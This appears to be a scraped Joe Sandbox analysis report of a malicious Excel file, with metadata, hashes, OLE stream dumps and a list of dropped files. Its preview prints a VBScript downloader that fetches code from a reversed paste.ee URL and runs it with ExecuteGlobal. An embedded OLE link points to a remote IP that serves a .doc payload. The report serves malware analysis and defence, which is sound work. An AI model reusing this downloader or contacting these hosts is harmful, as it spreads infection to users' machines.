Preview:	..S.e.t. .r.e.c.t.i.t.u.d.e. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t.t.p...W.i.n.H.t.t.p.R.e.q.u.e.s.t...5...1.".).....o.l.i.g.o.t.r.o.p.h.i.a. .=. .S.t.r.r.e.v.e.r.s.e.(.".m.X.G.n.e./.d./.e.e...e.t.s.a.p././.:.p.t.t.h.".).....r.e.c.t.i.t.u.d.e...O.p.e.n. .".G.E.T.".,.o.l.i.g.o.t.r.o.p.h.i.a.,. .F.a.l.s.e.....r.e.c.t.i.t.u.d.e...S.e.n.d.....a.z.e.i.t.a.d.o. .=. .r.e.c.t.i.t.u.d.e...R.e.s.p.o.n.s.e.T.e.x.t.....f.i.d.a.l.g.u.e.t.e. .a.z.e.i.t.a.d.o.....F.u.n.c.t.i.o.n. .f.i.d.a.l.g.u.e.t.e.(.a.m.e.d.r.o.n.t.a.d.o.).....E.x.e.c.u.t.e.G.l.o.b.a.l. .a.m.e.d.r.o.n.t.a.d.o.....E.n.d. .F.u.n.c.t.i.o.n.

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 15 01:17:58 2024, Security: 1
Entropy (8bit):	7.683865150237722
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Product list 0980DF098A7.xls
File size:	508'416 bytes
MD5:	0b0091320ed8b50b7f3f514536c8eddc
SHA1:	0d8c09b2e0331a93d645d67127ac86667a7aaf4e
SHA256:	baaffc0dd02ab5ab2da660fcb54c8ddfeaf0f1b26e30738f0e55d31f3fce938f
SHA512:	1bb99636e26f61bc2ed3f81ed9b48c7fe521fa1e3baac9f74f09ec5303800c6d6afc7fee0e3ad65c532d31e78fb15c8f947e64f12fae63c42dfb9ad500791a33
SSDEEP:	12288:2Tkh8VbzBZH3bVFQaMIKHlHhMjzJxb633k+yB:kRBJ3bVFYjWWkF
TLSH:	6CB40151FA80CA07E49943714DF78BAA5324FC419B928A0F320CF71D3EF47A56E27666
File Content Preview:	........................>.......................................................n...............h.......j......................................................................................................................................................

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-02-15 01:17:58
Creating Application:	Microsoft Excel
Security:	1

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j 5 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 6a d1 35 a5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j ~ z . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 6a d1 7e 7a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 6a d1 b3 b1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 6a d1 b8 e5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2603503175049817
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . n . _ . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

General
Stream Path:	MBD00014726/\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00014726/\x1Ole
CLSID:
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 4 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 34 00

General
Stream Path:	MBD00014726/CONTENTS
CLSID:
File Type:	PDF document, version 1.7, 1 pages
Stream Size:	20909
Entropy:	7.967116806702583
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 3 0 R . > > . e n d o b j . 4 0 o b j . < < . / P r o d u c e r ( 3 . 0 . 4 \\ ( 5 . 0 . 8 \\ ) ) . / M o d D a t e ( D : 2 0 2 3 0 9 2 2 0 3 2 2 4 8 + 0 2 ' 0 0 ' ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / P a g e s . / K i d s [ 5 0 R ] . / C o u n t 1 . > > . e n d o b j . 3 0 o b j . < < . / F i e l d s [ ] . / D R 6 0 R . > > . e n d
Data Raw:	25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 33 2e 30 2e 34 20 5c 28 35 2e 30 2e 38 5c 29 20 29 0a 2f 4d 6f 64 44 61 74 65

General
Stream Path:	MBD00014727/\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00014727/\x1Ole
CLSID:
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 3 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 33 00

General
Stream Path:	MBD00014727/CONTENTS
CLSID:
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Stream Size:	31606
Entropy:	7.916695020479147
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R \| ( ( " * " < 6 ] . . { n n \| . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69

General
Stream Path:	MBD00014728/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Product list 0980DF098A7.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

Exploits

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF5b6568.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.3784

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.3784

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\beautifulpeoplesaroundtheworldtodevelopnewthingswiththeworldwidetechnologyformicrosoftballonsystemdevelopementpcpcto[1].doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\loveforsave[1].vbs

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D4E0D6.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43354082.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\463A196F.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5157A1CC.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67B361A6.emf

Windows Analysis Report
Product list 0980DF098A7.xls

General
Stream Path:	MBD00014728/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	66451
Entropy:	7.894671819264755
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . e . , . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 65 8c 03 2c b7 01 00 00 9e 06 00 00 13 00 d4 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d0 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00014729/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00014729/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	708
Entropy:	3.6235698530352805
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00

General
Stream Path:	MBD00014729/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	23248
Entropy:	3.0408039696548754
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 5a 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 f4 00 00 00

General
Stream Path:	MBD00014729/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	97808
Entropy:	7.36505498504314
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

General
Stream Path:	MBD0001472A/\x1Ole
CLSID:
File Type:	data
Stream Size:	924
Entropy:	4.264506828978091
Base64 Encoded:	False
Data ASCII:	. . . . v b { 4 1 . . . . . . . . . . . . D . . . y . . . K . @ . . . h . t . t . p . : . / . / . 1 . 0 . 7 . . . 1 . 7 . 5 . . . 2 . 0 . 2 . . . 1 . 5 . 4 . / . r . m . c . / . b . e . a . u . t . i . f . u . l . p . e . o . p . l . e . s . a . r . o . u . n . d . t . h . e . w . o . r . l . d . t . o . d . e . v . e . l . o . p . n . e . w . t . h . i . n . g . s . w . i . t . h . t . h . e . w . o . r . l . d . w . i . d . e . t . e . c . h . n . o . l . o . g . y . f . o . r . m . i . c . r . o . s . o
Data Raw:	01 00 00 02 b9 e5 76 62 a0 7b 34 31 00 00 00 00 00 00 00 00 00 00 00 00 44 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 40 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 31 00 30 00 37 00 2e 00 31 00 37 00 35 00 2e 00 32 00 30 00 32 00 2e 00 31 00 35 00 34 00 2f 00 72 00 6d 00 63 00 2f 00 62 00 65 00 61 00 75 00 74 00 69 00 66 00 75 00 6c 00 70 00 65 00 6f 00 70 00

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	245602
Entropy:	7.998044678824266
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . X . O c W { ; ( . . . S . . [ x V . . C . ] } . . . . . . . : . . . \\ . p . . 7 M . k Z . m . . B \\ J h 9 C M B . . F . . . S 6 3 . . . # . . k . . . 7 . < W G . Z . Q w v ( / . } r ) e f 8 & P + ! Z H ; B . . . . } a . . . . . . . = . . . [ ) > . . . ) h O , 8 . ! . . . ? . . . . B . . . . . . . . . x . . . . . N . . . = * = . . . L l . x c % . . ) ] 6 @ . . . . . . . . z " . . . . . . . V . . . ( . . . K 1 . . . . F . % ; . ~ _ 5 o m . . . . i 1 . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 f9 a9 c7 cf 14 58 09 ed 4f 63 e8 57 7b 3b e8 e3 28 88 1b c0 e8 a3 a5 e7 08 53 1d 90 1d bb 5b c0 78 56 9a de 08 ba c8 89 43 fc f5 9e 0d 5d bf 7d e1 00 02 00 b0 04 c1 00 02 00 ea 3a e2 00 00 00 5c 00 70 00 83 bf d9 a3 f9 37 b3 4d 1b 6b 5a 13 6d 7f b4 cc 1d e3 f1 bd 9a 42 5c 4a 68 39 84 a8 43 4d

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	535
Entropy:	5.231306643917539
Base64 Encoded:	True
Data ASCII:	I D = " { E D 6 7 0 9 9 2 - 0 0 0 A - 4 5 4 8 - 8 9 A 4 - 5 9 C 3 E C D 2 5 C F E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 F 3 D D 8 0 C 2 8 1 C 5 4 2 0 5
